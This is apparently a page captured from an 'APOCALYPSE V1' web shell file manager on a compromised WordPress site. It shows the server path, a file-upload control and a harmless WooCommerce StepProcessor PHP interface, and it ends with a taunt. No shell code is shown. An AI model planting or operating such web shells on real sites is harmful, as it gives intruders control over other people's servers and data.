PK APOCALYPSE V1

APOCALYPSE V1

Current Path : /home/wallqcyy/public_html/wp-content/plugins/woocommerce/packages/blueprint/src/
Upload File :
Current File : /home/wallqcyy/public_html/wp-content/plugins/woocommerce/packages/blueprint/src/StepProcessor.php

<?php

namespace Automattic\WooCommerce\Blueprint;

/**
 * Interface StepProcessor
 */
interface StepProcessor {
	/**
	 * Process the schema.
	 *
	 * @param object $schema The schema to process.
	 *
	 * @return StepProcessorResult
	 */
	public function process( $schema ): StepProcessorResult;

	/**
	 * Get the step class.
	 *
	 * @return string
	 */
	public function get_step_class(): string;
	/**
	 * Check if the current user has the required capabilities for this step.
	 *
	 * @param object $schema The schema to process.
	 *
	 * @return bool True if the user has the required capabilities. False otherwise.
	 */
	public function check_step_capabilities( $schema ): bool;
}

if you don't want to be vaporized in a nuclear explosion, i simply have to become nuclear myself… i am atomic